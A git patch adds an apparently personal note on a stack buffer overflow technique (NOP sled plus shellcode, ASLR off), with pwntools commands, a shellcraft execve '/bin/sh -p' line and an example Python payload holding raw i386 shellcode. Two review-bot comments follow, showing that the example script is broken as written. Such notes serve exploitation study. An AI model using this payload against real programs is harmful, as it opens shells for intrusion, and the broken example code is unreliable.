From 4f00e34b9a6245ea7448c8bd3bc288c0da309987 Mon Sep 17 00:00:00 2001 From: whx Date: Fri, 27 Aug 2021 23:38:42 +0200 Subject: [PATCH] BO addition --- .../buffer_overflow/docs/cut_stack_in_half.md | 32 +++++++++++++++++++ .../docs/{radare2.md => ret_address_reuse.md} | 0 2 files changed, 32 insertions(+) create mode 100644 exploit/buffer_overflow/docs/cut_stack_in_half.md rename exploit/buffer_overflow/docs/{radare2.md => ret_address_reuse.md} (100%) diff --git a/exploit/buffer_overflow/docs/cut_stack_in_half.md b/exploit/buffer_overflow/docs/cut_stack_in_half.md new file mode 100644 index 0000000..3255b7d --- /dev/null +++ b/exploit/buffer_overflow/docs/cut_stack_in_half.md @@ -0,0 +1,32 @@ +# Cut Stack in Half + NOPsled + +* Stack has to be executable +* `cylic buffer` + `eip` content is `esp` + half of the stack + NOPsled + shellcode +* **ASLR has to be off** or `eip` content address pointing into the sled needs to be fuzzed hard + +## shellcraft +* for example +```sh +shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s +``` + +## Usage +* measure `eip` offset via + ```sh + cyclic + ``` + * Check eip content via gdb + ```sh + cyclic -l + ``` +* Example code +```python +from pwn import * + +padding(cyclic(cyclic_find()) +eip = p32( + some offset into stack) +sled = 90 * 100 +shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80" +payload = padding + eip + sled + shellcode +``` + diff --git a/exploit/buffer_overflow/docs/radare2.md b/exploit/buffer_overflow/docs/ret_address_reuse.md similarity index 100% rename from exploit/buffer_overflow/docs/radare2.md rename to exploit/buffer_overflow/docs/ret_address_reuse.md
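Review bot: the Python example in the new cut_stack_in_half.md does not run as written. `padding(cyclic(cyclic_find())` has unbalanced parentheses (a SyntaxError) and, once closed, calls `padding` instead of assigning to it; the pwntools form is `padding = cyclic(cyclic_find(value))` where `value` is the `eip` content read from gdb. `eip = p32( + some offset into stack)` is a placeholder rather than code and should be spelled out, e.g. `eip = p32(esp + offset)` with a comment saying where `esp` comes from. `sled = 90 * 100` evaluates to the integer 9000, not a NOP sled; a 100-byte sled is `b"\x90" * 100`. The shellcode literal is a `str`, so under Python 3 `padding + eip + sled + shellcode` raises TypeError; make it a bytes literal (`b"jhh..."`) or build it with `asm(shellcraft.i386.linux.execve("/bin///sh", ["sh", "-p"]))`, which also keeps the example consistent with the shellcraft section above it. Smaller points in the same file: "cylic buffer" should read "cyclic buffer"; `cyclic` needs a length argument (e.g. `cyclic 200`) and `cyclic -l` needs the EIP value to look up; the nested "Check eip content via gdb" bullet is indented differently from the sibling bullets; and the title term "cut stack in half" is never explained, so a sentence stating which value is halved and why the return address must land inside the sled would help a reader.

Review bot: the rename of exploit/buffer_overflow/docs/radare2.md to ret_address_reuse.md is not mentioned in the commit subject ("BO addition") and carries no content change (similarity index 100%), so the commit message should say why the file was renamed, or the rename should go in its own commit so the history stays readable.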